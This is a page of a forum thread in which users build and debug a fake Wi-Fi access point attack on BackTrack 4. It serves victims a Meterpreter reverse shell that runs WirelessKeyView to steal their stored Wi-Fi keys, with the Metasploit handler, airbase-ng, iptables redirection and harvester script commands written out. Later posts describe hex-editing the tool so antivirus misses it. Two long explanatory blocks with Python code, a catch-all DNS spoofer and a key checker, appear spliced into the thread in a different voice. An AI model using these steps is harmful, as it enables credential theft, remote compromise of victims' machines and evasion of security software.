Page 3 of 5 (Results 21 to 30 of 44)

Thread: Wireless key grabber - Backtrack 4

  1. #21
    Member (Join Date: Feb 2010, Posts: 204)

    On the Vista machine, do an ipconfig and let me know what you get.


    I am thinking: is there an IPv6 issue here? When doing the same thing on my N95, I monitor the at0 interface with Wireshark; I see IPv6 requests and then the N95 phone times out saying no web gateway. Just a theory.

    As for the wireless key, is this from an XP machine or Vista?
    The wireless key seems really short for a WPA hex key; it should be 64 characters long, like
    2cc55237638c88bb528a2d2a14b6e7cb59aa7564991fb082dfed05a689587f03


    Can someone do the following:

    create a fake AP using the -e command, and then disassociate the client and see if it will connect to our fake AP acting as a legit AP. This is something we couldn't get working with BackTrack 3 (the client would not associate); maybe it will work in BT4. If not, I will try it as soon as I get delivery of my USB pen and run BT4 from it. VMware is just too slow for doing these things.

  2. #22
    Good friend of the forums williamc (Join Date: Feb 2010, Location: Chico CA, Posts: 285)

    I've posted a video performing your steps using BT3 and XP:
    http://blip.tv/file/1899796/

    You'll see at the end that the wireless key is not 64 bits.

    I'll post another with Vista so we can walk through the troubleshooting. Thanks for your help!

    William

  3. #23
    Junior Member (Join Date: Jan 2010, Posts: 47)

    Quote Originally Posted by hm2075:

    Can someone do the following:

    create a fake AP using the -e command, and then disassociate the client and see if it will connect to our fake AP acting as a legit AP. This is something we couldn't get working with BackTrack 3 (the client would not associate); maybe it will work in BT4. If not, I will try it as soon as I get delivery of my USB pen and run BT4 from it. VMware is just too slow for doing these things.
    Yeah, I tried everything. There is no way to make a client automatically connect to your fake AP unless the real AP (not the fake) has no encryption (or at least WEP and you have the key, in which case there would be no reason to do the attack) and you have cloned the real AP (same MAC, channel and name; the name is case sensitive). So fake AP == real AP. I just tried it in BT4. I set my real AP to WPA TKIP PSK and made my HP laptop auto-connect to it. Then on the other laptop, a Dell with a Centrino 3945ABG, I created the clone fake AP (same MAC, same channel, same name, and with no encryption). Then I went to the extreme case: I powered off the real AP so that the HP would see only the fake clone (with no encryption), and it turned out that it never connected to the fake one. So there is a paradox: you can only grab keys from those PCs which have no keys, because only those can connect to the fake AP.

    Otherwise, connecting manually to a fake AP, everything works. ESET Smart Security (update 28/03/2009 11:46) didn't detect anything, thanks to the hex edit probably. (I scanned wkv.exe on some online virus checkers and only on one page did 2 of them detect it as a 'virus'; I think it was Avast and McAfee.)

    I used a non-transparent AP and also the apache2 service that comes with BT4.
    First, copy what's in the WKV folder into the /var/www/ folder.



    1. Start the Meterpreter listener
    Code:
    # Metasploit 3 ships under /pentest in BT4
    cd /pentest/exploits/framework3
    # the handler listens on the at0 address configured in step 3; -j runs it as a background job
    ./msfconsole
    
    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 10.0.0.1
    set LPORT 5555
    set AutoRunScript /var/www/harvester.rb
    set ExitOnSession false
    show options
    exploit -j
    2. Start the fake AP
    Code:
    modprobe tun                   # airbase-ng needs the tun/tap module to create at0
    airbase-ng -e "XX" wlan0 -v    # wlan0 must be in monitor mode; -e sets the ESSID, -v is verbose
    On the tests I made, I tried every single option of airbase. There is no way to connect to it (always talking about the encrypted test).


    3. Configure the IPs, Apache, and spoof DNS to Apache
    Code:
    cp '/var/www/dhcpd.conf' '/etc/dhcp3/'
    ifconfig lo up
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    # start from empty filter and nat tables
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    # every UDP packet (DNS included) and every TCP/80 connection from the client is redirected to this box
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
    iptables -P FORWARD ACCEPT
    iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
    # repeated on purpose: dhcp3-server would not start without re-running these
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    /etc/init.d/dhcp3-server restart
    
    service apache2 start
    
    cd /var/www/
    # the "spoofdns" step: points DNS answers at the Apache host
    java ServerKernelMain 10.0.0.1 10.0.0.1
    I re-added the repeated ifconfig lines because it gave me problems with the dhcp3-server start. With those commands re-added, it works.

    Once again, this is a NON-TRANSPARENT fake AP.

    BIG THANKS TO hm2075
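    The step 3 rules above DNAT every UDP packet and every TCP/80 connection from the client to 10.0.0.1, and the `java ServerKernelMain` command supplies the DNS answers that make any hostname the victim types land on the Apache page. The block below is an added example, not the tool used in this thread: a minimal "answer everything" DNS responder in Python 3 that shows what such a spoofer does at the wire level. The 10.0.0.1 address is taken from the posted procedure; `build_query` exists only to construct a sample packet for offline testing, and the TTL, the AA flag and answering every question with an A record are simplifying assumptions.

```python
"""Minimal DNS "answer everything" responder (added example, not the thread's tool).

Every query is answered with the same A record, which is what the fake-AP
procedure needs: any hostname the victim resolves points at the attacker's
Apache host. Simplification (assumption): non-A questions also get an A
answer; a fuller responder would answer per query type.
"""
import socket
import struct

SPOOF_IP = "10.0.0.1"   # the at0 address used in the posted procedure


def parse_qname(data: bytes, offset: int):
    """Return (name, offset_after_name). Handles plain labels only; queries
    from clients do not use compression pointers in the question section."""
    labels = []
    while True:
        length = data[offset]
        offset += 1
        if length == 0:
            break
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), offset


def build_query(txid: int, name: str, qtype: int = 1) -> bytes:
    """Construct a standard recursion-desired query (sample input for testing)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, 1)


def build_response(query: bytes, ip: str = SPOOF_IP):
    """Return (spoofed_response_bytes, queried_name) for one DNS query packet."""
    txid, flags, qdcount = struct.unpack("!HHH", query[:6])
    if qdcount != 1:
        raise ValueError("only single-question queries are handled")
    name, end = parse_qname(query, 12)
    question = query[12:end + 4]          # QNAME + QTYPE + QCLASS, echoed back verbatim
    # Flags: QR=1, AA=1 (assumed), RD copied from the query, RA=1, RCODE=0
    rd = flags & 0x0100
    resp_flags = 0x8000 | 0x0400 | rd | 0x0080
    header = struct.pack("!HHHHHH", txid, resp_flags, 1, 1, 0, 0)
    # Answer RR: pointer to the name at offset 12 (0xC00C), type A, class IN,
    # TTL 60 (assumed), RDLENGTH 4, then the IPv4 address
    answer = struct.pack("!HHHIH", 0xC00C, 1, 1, 60, 4) + socket.inet_aton(ip)
    return header + question + answer, name


def parse_answer_ip(response: bytes) -> str:
    """Pull the A record address out of a response built by build_response."""
    _, end = parse_qname(response, 12)
    ans = end + 4                          # skip QTYPE/QCLASS of the question
    rdlength = struct.unpack("!H", response[ans + 10:ans + 12])[0]
    return socket.inet_ntoa(response[ans + 12:ans + 12 + rdlength])


def serve(bind_ip: str = SPOOF_IP, port: int = 53):
    """Answer forever on UDP/53 (needs root; not exercised by the inline demo)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((bind_ip, port))
    while True:
        data, peer = sock.recvfrom(512)
        try:
            resp, name = build_response(data)
        except (ValueError, IndexError, UnicodeDecodeError):
            continue                       # malformed or multi-question packet: drop it
        print(f"{peer[0]} asked for {name} -> {bind_ip}")
        sock.sendto(resp, peer)


if __name__ == "__main__":
    q = build_query(0x1234, "www.example.com")    # constructed sample query
    r, n = build_response(q)
    print(n, parse_answer_ip(r))
```

    Run `serve()` as root on the attack box after the at0 configuration. The response copies the transaction ID and the question section back unchanged, which is what a stub resolver checks before accepting an answer. A client that asks for AAAA first (the IPv6 lookups hm2075 saw from the N95) gets an A record back here and will typically ignore it, so a fuller responder should answer AAAA queries with an AAAA record or an empty answer.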

  4. #24
    Member (Join Date: Feb 2010, Posts: 204)

    I am aware that the -P command isn't working as it should,

    hence we can't disassociate a victim and get them to connect; maybe someone should speak to the aircrack team about this.

  5. #25
    Junior Member (Join Date: Jan 2010, Posts: 47)

    Here is some more info.
    http://forum.aircrack-ng.org/index.php?topic=3247.0



    -P -C 30 works quite well for non-encrypted APs. Most clients are redirected to the fake one, independent of the ESSID name specified in the airbase command.

    By the way, a new version of WirelessKeyView has been released, 1.26: http://www.nirsoft.net/utils/wirelesskeyview.zip

  6. #26
    Junior Member (Join Date: Jan 2010, Posts: 47)

    Quote Originally Posted by williamc:
    Thanks for the response. The Vista problem is before the file is even uploaded. I'm unable to browse to the payload page. The client has received the DHCP information from the attack box, but gets "page cannot be displayed" when browsing. I cannot ping the attack box IP or gateway; I get "Destination Unreachable".

    As for the wireless key in hex, this is what gets dumped into the WKV folder:
    Code:
    cat FVPVC.txt
    Linksys             WPA-PSK             a78178f5a4050ce82de1              Dell Wireless 1350
    w {15CDB4A8-98B9-4285-
    It's not 64 bytes, and like I said, it crashes Cain when I load it.

    William
    I found the error why it does not display the full WPA-PSK hex key.
    In the harvester.rb script, change the way wkv.exe is executed from
    Code:
    client.sys.process.execute("cmd.exe /c %SystemDrive%\\wkv.exe /stabular /#{out}", nil, {'Hidden' => 'false'})
    to
    Code:
    client.sys.process.execute("cmd.exe /c %SystemDrive%\\wkv.exe /stab /#{out}", nil, {'Hidden' => 'false'})
    Now it displays the full hex key.

    And here is the info about the difference between Vista and XP:

    Code:
    Notice About WPA-PSK Keys
    When you type a WPA-PSK key in Windows XP, the characters that
    you type are automatically converted into a new binary key that
    contains 32 bytes (64 Hexadecimal digits). This binary key cannot
    instantly be converted back to the original key that you typed, but you
    can still use it for connecting the wireless network exactly like the
    original key. In this case, WirelessKeyView displays this binary key in
    the Hex key column, but it doesn't display the original key that you
    typed.
    As opposed to Windows XP, Windows Vista doesn't convert the
    WPA-PSK Key that you type into a new binary key, but it simply keeps
    the original key that you type. So under Windows Vista, the original
    WPA-PSK key that you typed is displayed in the Ascii key column.

    Now it's all in the airbase team's hands. That's the missing part!!!
    Hope to get something soon!!! I know they can.
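    The NirSoft notice quoted above and the "too short" key in post #21 are two sides of the same fact: XP stores the 802.11i pre-shared key that the passphrase is stretched into (PBKDF2-HMAC-SHA1 with the SSID as salt, 4096 iterations, 32 bytes, hence 64 hex digits), while Vista stores the passphrase itself. As an added example, not code from this thread or from WirelessKeyView, the Python 3 block below derives that key for the published 802.11i test vector and runs the length check the thread spent several posts on against tab-delimited (/stab) output. The column order, the `classify_key` and `parse_stab` helpers and the sample lines are assumptions and constructed data; the 20-digit hex value is the truncated one williamc posted.

```python
"""Added example: WPA-PSK derivation plus a completeness check for dumped keys.

IEEE 802.11i derives the 256-bit PSK from the typed passphrase as
PSK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
Windows XP stores that PSK (64 hex digits); Vista stores the passphrase.
Either one authenticates, so a harvester only needs to tell which form it
got and whether the hex form arrived complete.
"""
import hashlib
import re

HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
# Complete hex lengths per key type: WEP-40 / WEP-104 and the WPA-PSK binary key.
EXPECTED_HEX_LEN = {"WEP": (10, 26), "WPA-PSK": (64,)}
# Assumed column order for WirelessKeyView tab-delimited (/stab) output.
STAB_COLUMNS = ("ssid", "key_type", "key_hex", "key_ascii", "adapter", "guid")
# Constructed sample, not real output: the truncated hex key is the one posted
# in this thread; SSIDs, adapters and GUIDs are placeholders.
SAMPLE_STAB = (
    "Linksys\tWPA-PSK\ta78178f5a4050ce82de1\t\tDell Wireless 1350\t"
    "{00000000-0000-0000-0000-000000000000}\n"
    "HomeNet\tWPA-PSK\t\tcorrect horse battery\tIntel(R) PRO/Wireless 3945ABG\t"
    "{11111111-1111-1111-1111-111111111111}\n"
)


def wpa_psk(passphrase: str, ssid: str) -> str:
    """Return the 64-hex-digit PSK that XP stores for a typed passphrase."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 ASCII characters")
    raw = hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                              ssid.encode("utf-8"), 4096, 32)
    return raw.hex()


def classify_key(key_type: str, key: str) -> str:
    """Classify one harvested key by shape.

    'passphrase'    : non-hex text, the form Vista hands back
    'hex-complete'  : hex of the expected length for the key type
    'hex-truncated' : hex but too short, e.g. the /stabular column cut-off
                      debugged in this thread (a passphrase consisting only
                      of hex digits also lands here and needs a manual look)
    """
    if not HEX_RE.match(key):
        return "passphrase" if key_type == "WPA-PSK" else "unknown"
    lengths = EXPECTED_HEX_LEN.get(key_type)
    if lengths is None:
        return "unknown"
    return "hex-complete" if len(key) in lengths else "hex-truncated"


def parse_stab(text: str) -> list:
    """Parse /stab output into dicts and attach a status for the key present."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split("\t")
        padded = fields + [""] * (len(STAB_COLUMNS) - len(fields))
        rec = dict(zip(STAB_COLUMNS, padded))
        key = rec["key_hex"] or rec["key_ascii"]
        rec["status"] = classify_key(rec["key_type"], key) if key else "empty"
        records.append(rec)
    return records


if __name__ == "__main__":
    # IEEE 802.11i test vector: passphrase "password", SSID "IEEE"
    print(wpa_psk("password", "IEEE"))
    for rec in parse_stab(SAMPLE_STAB):
        print(rec["ssid"], rec["key_type"], rec["status"])
```

    A harvester that ran this check before handing keys to Cain would have flagged the /stabular output immediately: a 20-digit WPA-PSK hex value is neither a complete PSK nor a passphrase. The derivation is also one-way, which is what the notice means by "cannot instantly be converted back": the 64-digit key lets you join the network but does not reveal what the user typed.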

  7. #27
    Member (Join Date: Feb 2010, Posts: 204)

    Nice one takedown32,

    glad there are people actually following the code and not blindly doing things.

    For the airbase bit, we will just have to wait until the official 1.0 release; there are a few things that need to be fixed, as highlighted in the project map.

    PS: if you want wkv to be undetected you need to unpack it first, then open it up in a hex editor, scroll somewhere towards the middle and find references to the author/company, and change a few characters. That way you screw the signature up and most AVs will not detect it. For the remaining AVs that do detect it you will have to hex edit elsewhere; in theory it is possible.

  8. #28
    Junior Member (Join Date: Jan 2010, Posts: 47)

    Yeah, thanks for the trick. The first version 1.26 was detected only by eSafe on VirusTotal: http://www.virustotal.com/analisis/0...58ad016799f529

    After editing:

    http://www.virustotal.com/analisis/5...4a31d85cc0f62d
    NONE.

  9. #29
    Member (Join Date: Feb 2010, Posts: 204)

    What did you use to unpack?

    I think I used an expander in Windows, PE-edit??

    I just need it for reference if other people want to do this.

  10. #30
    Junior Member (Join Date: Jan 2010, Posts: 47)

    No, I always use Universal Extractor v1.6.0.0; more info here: http://www.legroom.net/software/uniextract
    Great all-in-one extractor!!!
